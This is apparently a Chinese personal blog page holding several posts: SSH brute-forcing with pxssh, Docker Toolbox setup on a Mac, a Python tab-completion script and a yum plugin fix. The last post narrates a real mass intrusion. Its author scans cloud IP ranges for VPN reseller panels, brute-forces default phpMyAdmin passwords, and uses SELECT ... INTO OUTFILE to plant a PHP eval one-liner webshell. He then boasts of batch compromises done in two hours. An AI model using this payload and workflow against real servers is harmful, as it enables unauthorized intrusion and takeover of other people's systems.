knickers 发布的文章

利用python-pxssh实现ssh暴力破解,昨天的文章中完成了利用pexpect来执行登录ssh的操作,今天利用pxssh来进行暴力破解,pxssh是一个在pexpect库中的专用脚本,不需要单独安装,有的python版本可以直接import pxssh,有的则需要from pexpect import pxssh 来进行包含,这个根据各自版本进行修改。我的是后者的方式。
源码如下:(存在word中了。。。。代码就成两行,就截图了)

QQ20190331-133949@2x.png
QQ20190331-134100@2x.png
QQ20190331-134114@2x.png
QQ20190331-134124@2x.png

上课需要用c++,老师统一使用vs,Mac系统表示捉急,于是想了下比较流行的docker,顺便平时还能联系下linux知识,不然的话平时也不经常用linux了,首先是mac安装docker,(其实docker machine的原理是通过vbox模拟了一个存在docker环境的系统,在通过ssh连接)。
这里我推荐使用docker toolbox,因为还能有vbox自由度比较高。

QQ20190331-133544@2x.png

从这里下载安装过程就不多写了,都一样。
接下来打开
QQ20190331-133550@2x.png
会提示创建一个虚拟机和下载一个iso镜像,这时候推荐能够fq,否则的话会下载很久。boot2docker.iso这个文件。
https://cdn.v2ex.com/docker/boot2docker.iso
这是一个国内镜像,mv到指定目录下,这样就可以防止下载超时了。
在打开docker terminal后,关闭窗口,不要着急使用。
这里我们打开Mac自带的shell和vbox
会看到有一个名称为defautl的虚拟机,开启它。
QQ20190331-133559@2x.png
然后,在shell端输入

[bash]
ssh docker@192.168.99.100
[/bash]

密码是tcuser

这样就可以直接连上了,可以看得出来就是一个集成docker的linux,
QQ20190331-133609@2x.png
我pull了一个python集成环境的镜像,创建一个容器。
https://c.163.com/hub#/m/home/
网易蜂巢镜像公共仓库速度都不错

[bash]
docker run –t –i yourimages /bin/bash
docker exec –it xxxxxxxx /bin/bash
[/bash]

QQ20190331-133621@2x.png
QQ20190331-133631@2x.png
上面第一个命令是创建一个容器,第二条命令时当按control+d推出后能够重新连接进入同一容器的命令。
平时一些常用的命令:

[bash]
docker ps –a
docker rm xxxxxxxx
docker images
docker rmi xxxxxxx
[/bash]

Python的tab补全功能,这样在卡法过程中能省下很多事情,代码转自一个别人的blog,就当做纪录了。http://www.cnblogs.com/xiaoyanger/p/5900580.html

Vi tab.py

[python]
#!/usr/bin/python
# python tab file
  
import sys
import readline
import rlcompleter
import atexit
import os
# tab completion
readline.parse_and_bind('tab: complete')
# history file
histfile = os.path.join(os.environ['HOME'], '.pythonhistory')
try:
    readline.read_history_file(histfile)
except IOError:
    pass
atexit.register(readline.write_history_file, histfile)
del os, histfile, readline, rlcompleter
[/python]

查看python目录

[bash]
python
import sys
sys.path
[/bash]

mv到目标路径

[bash]
mv tab.py /usr/local/lib/python2.7/
[/bash]

这样在以后写程序过程中import tab就能使用了。

今天想再mac下安装py3和scrapy,想了想不折腾本机了,直接虚拟机就行了,然后安装了vbox,centos6.8,装机时选择的是桌面最小化安装,在随后使用yum的过程中出现了fastestmirror不能使用的情况,简单查了下,是yum的加速插件出了问题,我就直接禁用他了。(操作前请备份)

loaded plugins:fastestmirror ,fefresh-packagekit,security
you need to be root to perform this command.

QQ20190331-133220@2x.png

[bash]
su
vi  /etc/yum/pluginconf.d/fastestmirror.conf  
[/bash]
enabled=0//改为1
[bash]
vi /etc/yum.conf
[/bash]
plugins=1    //改为0

QQ20190331-133229@2x.png

可以看到,yum可以正常使用了。

上一篇文章说篇幅太少,其实操作就那样,没必要一步一步的说明,有的朋友给我发邮件私聊了下,很简单就复现了。

接下来正文,之前发现某些免流脚本,都是默认密码,数据库管理都是phpmyadmin,lnmp自动安装的,有些选项都没有让用户自己填写,导致了批量shell。简介就是这样。坛子里好像是有过入侵的,不过是通过burp爆破phpmyadmin。通用了一下,大家就明白了吧。
首先我了解到免流的web服务通常使用1234端口和808端口,那么开始找腾讯云的ip段进行扫描。

QQ20190331-132728@2x.png

扫描后复制下来保存到记事本中,批量处理下后缀名。
QQ20190331-132735@2x.png
保存ip之后导入,设置用户名,密码字典等。
QQ20190331-132742@2x.png
QQ20190331-132750@2x.png
开始爆破。
爆破之后导出ip和密码
QQ20190331-132800@2x.png
之前有过某个做黑产的牛发的扫过的。
逐条打开测试
QQ20190331-132809@2x.png
登陆phpmyadmin
点击sql,既然是mysql的root权限,那就可以通过找到绝对路径后写shell,
而脚本安装都是统一的目录,而且安装的是lnmp环境。So

 select '<?php @eval($_POST[1111])?>' into outfile '/home/wwwroot/default/admin/index1.php'

一句话写入,这样的话可以用菜刀连接了
QQ20190331-132818@2x.png

这是之前搞得12月份的批量,基本两个小时。